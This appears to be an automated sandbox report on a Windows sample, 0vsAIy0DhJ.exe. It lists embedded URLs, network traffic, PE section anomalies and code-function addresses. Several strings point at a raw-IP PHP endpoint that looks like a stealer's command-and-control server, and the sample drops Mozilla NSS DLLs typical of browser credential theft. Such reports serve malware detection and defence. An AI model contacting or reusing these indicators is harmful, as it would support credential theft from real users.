Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.0000000000677000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phprofiles
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.000000000102E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phprowser
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.0000000000677000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpser
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.000000000102E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpxA
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.0000000000677000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.115c4becf79229cb002.phpser
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.000000000102E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115y
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: chromecache_79.3.dr	String found in binary or memory: http://www.broofa.com
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2015932243.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2008760591.0000000005963000.00000004.00000020.00020000.00000000.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2015215696.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: FIDAFCAF.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chromecache_77.3.dr	String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: chromecache_77.3.dr	String found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
Source: chromecache_77.3.dr, chromecache_79.3.dr	String found in binary or memory: https://apis.google.com
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2011664540.000000000B992000.00000004.00000020.00020000.00000000.sdmp, DBFHDBGIEBFIIDGCBFBK.0.dr	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2011664540.000000000B992000.00000004.00000020.00020000.00000000.sdmp, DBFHDBGIEBFIIDGCBFBK.0.dr	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: FIDAFCAF.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: FIDAFCAF.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: FIDAFCAF.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chromecache_77.3.dr	String found in binary or memory: https://clients6.google.com
Source: chromecache_77.3.dr	String found in binary or memory: https://content.googleapis.com
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2011664540.000000000B992000.00000004.00000020.00020000.00000000.sdmp, DBFHDBGIEBFIIDGCBFBK.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2011664540.000000000B992000.00000004.00000020.00020000.00000000.sdmp, DBFHDBGIEBFIIDGCBFBK.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: chromecache_77.3.dr	String found in binary or memory: https://domains.google.com/suggest/flow
Source: FIDAFCAF.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: FIDAFCAF.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: FIDAFCAF.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: chromecache_79.3.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
Source: chromecache_79.3.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
Source: chromecache_79.3.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
Source: chromecache_79.3.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
Source: DBFHDBGIEBFIIDGCBFBK.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: chromecache_79.3.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chromecache_77.3.dr	String found in binary or memory: https://plus.google.com
Source: chromecache_77.3.dr	String found in binary or memory: https://plus.googleapis.com
Source: KKFHJJDHJEGHJKECBGCFHDBFIE.0.dr	String found in binary or memory: https://support.mozilla.org
Source: KKFHJJDHJEGHJKECBGCFHDBFIE.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: KKFHJJDHJEGHJKECBGCFHDBFIE.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.0000000000594000.00000040.00000001.01000000.00000003.sdmp, 0vsAIy0DhJ.exe, 00000000.00000003.1833434443.000000000585E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.0000000000594000.00000040.00000001.01000000.00000003.sdmp, 0vsAIy0DhJ.exe, 00000000.00000003.1833434443.000000000585E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.0000000000594000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: chromecache_77.3.dr	String found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2011664540.000000000B992000.00000004.00000020.00020000.00000000.sdmp, DBFHDBGIEBFIIDGCBFBK.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: FIDAFCAF.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2011664540.000000000B992000.00000004.00000020.00020000.00000000.sdmp, DBFHDBGIEBFIIDGCBFBK.0.dr	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: FIDAFCAF.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chromecache_77.3.dr	String found in binary or memory: https://www.googleapis.com/auth/plus.me
Source: chromecache_77.3.dr	String found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
Source: chromecache_79.3.dr	String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
Source: chromecache_79.3.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
Source: chromecache_79.3.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
Source: KKFHJJDHJEGHJKECBGCFHDBFIE.0.dr	String found in binary or memory: https://www.mozilla.org
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.0000000000677000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: KKFHJJDHJEGHJKECBGCFHDBFIE.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.0000000000677000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.0000000000677000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: KKFHJJDHJEGHJKECBGCFHDBFIE.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.0000000000677000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: 0vsAIy0DhJ.exe, 00000000.00000003.1957005080.000000000BBD3000.00000004.00000020.00020000.00000000.sdmp, KKFHJJDHJEGHJKECBGCFHDBFIE.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: KKFHJJDHJEGHJKECBGCFHDBFIE.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.0000000000677000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: 0vsAIy0DhJ.exe, 00000000.00000003.1957005080.000000000BBD3000.00000004.00000020.00020000.00000000.sdmp, KKFHJJDHJEGHJKECBGCFHDBFIE.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.0000000000677000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443

System Summary

PE file contains section with special chars

Source: 0vsAIy0DhJ.exe	Static PE information: section name:
Source: 0vsAIy0DhJ.exe	Static PE information: section name: .idata
Source: 0vsAIy0DhJ.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe

Code function: 0_2_6C6B62C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy,

0_2_6C6B62C0

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C53AC60	0_2_6C53AC60
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C60AC30	0_2_6C60AC30
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5F6C00	0_2_6C5F6C00
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C58ECD0	0_2_6C58ECD0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C52ECC0	0_2_6C52ECC0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5FED70	0_2_6C5FED70
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C65AD50	0_2_6C65AD50
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C6B8D20	0_2_6C6B8D20
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C6BCDC0	0_2_6C6BCDC0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5C6D90	0_2_6C5C6D90
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C534DB0	0_2_6C534DB0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5CEE70	0_2_6C5CEE70
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C610E20	0_2_6C610E20
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C53AEC0	0_2_6C53AEC0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5D0EC0	0_2_6C5D0EC0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5B6E90	0_2_6C5B6E90
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C59EF40	0_2_6C59EF40
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5F2F70	0_2_6C5F2F70
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C536F10	0_2_6C536F10
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C670F20	0_2_6C670F20
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C60EFF0	0_2_6C60EFF0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C530FE0	0_2_6C530FE0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C678FB0	0_2_6C678FB0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C53EFB0	0_2_6C53EFB0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C604840	0_2_6C604840
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C63E850	0_2_6C63E850
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C580820	0_2_6C580820
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5BA820	0_2_6C5BA820
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C6368E0	0_2_6C6368E0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C61C8C0	0_2_6C61C8C0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C568960	0_2_6C568960
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C586900	0_2_6C586900
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C64C9E0	0_2_6C64C9E0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5649F0	0_2_6C5649F0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5F09B0	0_2_6C5F09B0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5C09A0	0_2_6C5C09A0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5EA9A0	0_2_6C5EA9A0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5ACA70	0_2_6C5ACA70
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5DEA00	0_2_6C5DEA00
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5E8A30	0_2_6C5E8A30
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C630AC0	0_2_6C630AC0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5AEA80	0_2_6C5AEA80
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C636BE0	0_2_6C636BE0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C634BE0	0_2_6C634BE0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C61EBD0	0_2_6C61EBD0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5D0BA0	0_2_6C5D0BA0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C548460	0_2_6C548460
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5BA430	0_2_6C5BA430
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C594420	0_2_6C594420
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5764D0	0_2_6C5764D0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5CA4D0	0_2_6C5CA4D0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C65A480	0_2_6C65A480
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C588540	0_2_6C588540
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C634540	0_2_6C634540
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5D0570	0_2_6C5D0570
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C678550	0_2_6C678550
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C592560	0_2_6C592560
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5BE5F0	0_2_6C5BE5F0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5FA5E0	0_2_6C5FA5E0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5245B0	0_2_6C5245B0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C58C650	0_2_6C58C650
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5546D0	0_2_6C5546D0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C58E6E0	0_2_6C58E6E0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5CE6E0	0_2_6C5CE6E0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5B0700	0_2_6C5B0700
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C55A7D0	0_2_6C55A7D0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C57E070	0_2_6C57E070
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5F8010	0_2_6C5F8010
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5FC000	0_2_6C5FC000
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C528090	0_2_6C528090
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C60C0B0	0_2_6C60C0B0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5400B0	0_2_6C5400B0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C644090	0_2_6C644090
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C598140	0_2_6C598140
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C614130	0_2_6C614130
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5A6130	0_2_6C5A6130
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5301E0	0_2_6C5301E0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5C8250	0_2_6C5C8250
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5B8260	0_2_6C5B8260
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C608220	0_2_6C608220
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5FA210	0_2_6C5FA210
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C6B62C0	0_2_6C6B62C0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C6022A0	0_2_6C6022A0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5FE2B0	0_2_6C5FE2B0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C64C360	0_2_6C64C360
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C538340	0_2_6C538340
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C672370	0_2_6C672370
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C532370	0_2_6C532370
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5C6370	0_2_6C5C6370
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5A2320	0_2_6C5A2320
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5843E0	0_2_6C5843E0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C58E3B0	0_2_6C58E3B0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5623A0	0_2_6C5623A0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C63DC60	0_2_6C63DC60
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C533C40	0_2_6C533C40
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C659C40	0_2_6C659C40
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C541C30	0_2_6C541C30
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C66DCD0	0_2_6C66DCD0
